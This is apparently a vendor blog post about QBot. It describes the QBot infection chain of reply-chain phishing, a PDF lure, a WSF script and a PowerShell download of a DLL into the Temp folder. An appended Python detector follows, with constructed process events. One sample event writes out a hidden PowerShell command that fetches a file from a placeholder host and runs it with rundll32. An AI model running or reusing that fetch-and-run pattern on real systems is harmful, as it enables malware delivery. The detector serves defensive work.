At Malwarebytes, we talk a lot about the importance of threat hunting for SMBs, and not for no good reason, either. Just consider the fact that, when a threat actor breaches a network, they don't attack right away. The median amount of time between system compromise and detection is 21 days.

By that time, it's often too late. Data has been harvested or ransomware has been deployed. Threat hunting helps find and remediate highly obfuscated threats like these that quietly lurk in the network, siphoning off confidential data and searching for credentials to access the "keys to the kingdom."

The bad news for small-to-medium sized businesses (SMBs): manually intensive and costly threat-hunting tools usually restrict this practice to larger organizations with an advanced cybersecurity model and a well-staffed security operations center (SOC).

That's where Malwarebytes Managed Detection and Response (MDR) comes in. Malwarebytes MDR is a service that provides around-the-clock monitoring of an organization's environment for signs of a cyberattack.

But talk is cheap: let's look at a real case in which Malwarebytes MDR successfully helped a company detect and respond to a potent banking Trojan known as QBot.

On a date left undisclosed for security reasons, a reputable oil and gas company we'll refer to as Company 1 experienced an intrusion in their network. The culprit was Qakbot (also known as QBot).

QBot is notorious for its abilities to steal sensitive information, like login credentials, financial data, and personal information, and even create backdoors for additional malware to infiltrate the compromised system. What's more, it also facilitates remote access to the compromised machines.

QBot has recently been observed being distributed as part of a phishing campaign using PDFs and Windows Script Files (WSF).

The QBot campaign illustrated (Source: Jerome Segura | Malwarebytes Labs)

QBot attacks start with a reply-chain phishing email, in which threat actors reply to an existing chain of emails with a malicious link or attachment.

A sample reply-chain phishing email in French, carrying a PDF attachment disguised as a cancellation letter.

Once someone in the email chain opens the attached PDF, they see a message saying, "This document contains protected files, to display them, click on the 'open' button." Clicking the button downloads a ZIP file containing the WSF script.

The heavily obfuscated script contains a mix of JS and VBScript code that, when run, launches a PowerShell process that then downloads the QBot DLL from a list of hardcoded URLs. The script tries each URL in turn until a file is downloaded to the Windows Temp folder (%TEMP%) and executed.

Once QBot runs, it issues a PING command to check for an internet connection.
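As an added illustration (not code from the Malwarebytes write-up), here is a small Python detector for the chain just described: a script host running the WSF, a PowerShell child, a stage executed out of %TEMP%, and finally ping.exe. It runs over constructed Sysmon-style process-creation records; the pids, paths, and the use of rundll32 as the DLL loader are assumptions.

```python
from collections import namedtuple
# Constructed Sysmon-style process-creation record (hypothetical fields, not real telemetry).
ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # hosts that run a .wsf file

def _name(path):
    return path.rsplit("\\", 1)[-1].lower()

def lineage(events, pid):
    """Ancestors of pid, oldest first (pid itself excluded); stops on unknown or cyclic parents."""
    by_pid = {e.pid: e for e in events}
    chain, cur = [], by_pid.get(pid)
    while cur is not None and cur.ppid in by_pid and cur.ppid not in {c.pid for c in chain}:
        cur = by_pid[cur.ppid]
        chain.append(cur)
    return chain[::-1]

def qbot_like_chains(events):
    """pids of ping.exe processes whose ancestry is script host -> powershell.exe ->
    a stage run out of the Temp folder, i.e. the chain described in the write-up."""
    hits = []
    for e in events:
        if _name(e.image) != "ping.exe":
            continue
        anc = lineage(events, e.pid)
        names = [_name(a.image) for a in anc]
        host = [i for i, n in enumerate(names) if n in SCRIPT_HOSTS]
        ps = [i for i, n in enumerate(names) if n == "powershell.exe" and host and i > host[0]]
        if not ps:
            continue
        # payload stage: any process started below PowerShell that references %TEMP%
        if any("\\temp\\" in a.cmdline.lower() or "%temp%" in a.cmdline.lower() for a in anc[ps[0] + 1:]):
            hits.append(e.pid)
    return hits

# Constructed sample: one full chain (pids 200-500) and one script-host chain without a
# Temp-folder stage (800-1000). rundll32 as the loader is assumed; the write-up only says "executed".
T = r"C:\Users\u\AppData\Local\Temp"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\u\Downloads\doc.wsf"'),
    ProcEvent(300, 200, PS, f"powershell.exe -w hidden -c iwr http://example.invalid/x -OutFile {T}\\x.dll"),
    ProcEvent(400, 300, r"C:\Windows\System32\rundll32.exe", f"rundll32.exe {T}\\x.dll,DllRegisterServer"),
    ProcEvent(500, 400, r"C:\Windows\System32\PING.EXE", "ping.exe -n 1 www.example.com"),
    ProcEvent(800, 100, r"C:\Windows\System32\wscript.exe", "wscript.exe logon.vbs"),
    ProcEvent(900, 800, PS, "powershell.exe -c Get-Date"),
    ProcEvent(1000, 900, r"C:\Windows\System32\PING.EXE", "ping.exe dc01"),
]
```

`qbot_like_chains(SAMPLE_EVENTS)` flags only pid 500; the second chain never runs anything from the Temp folder, so it stays quiet.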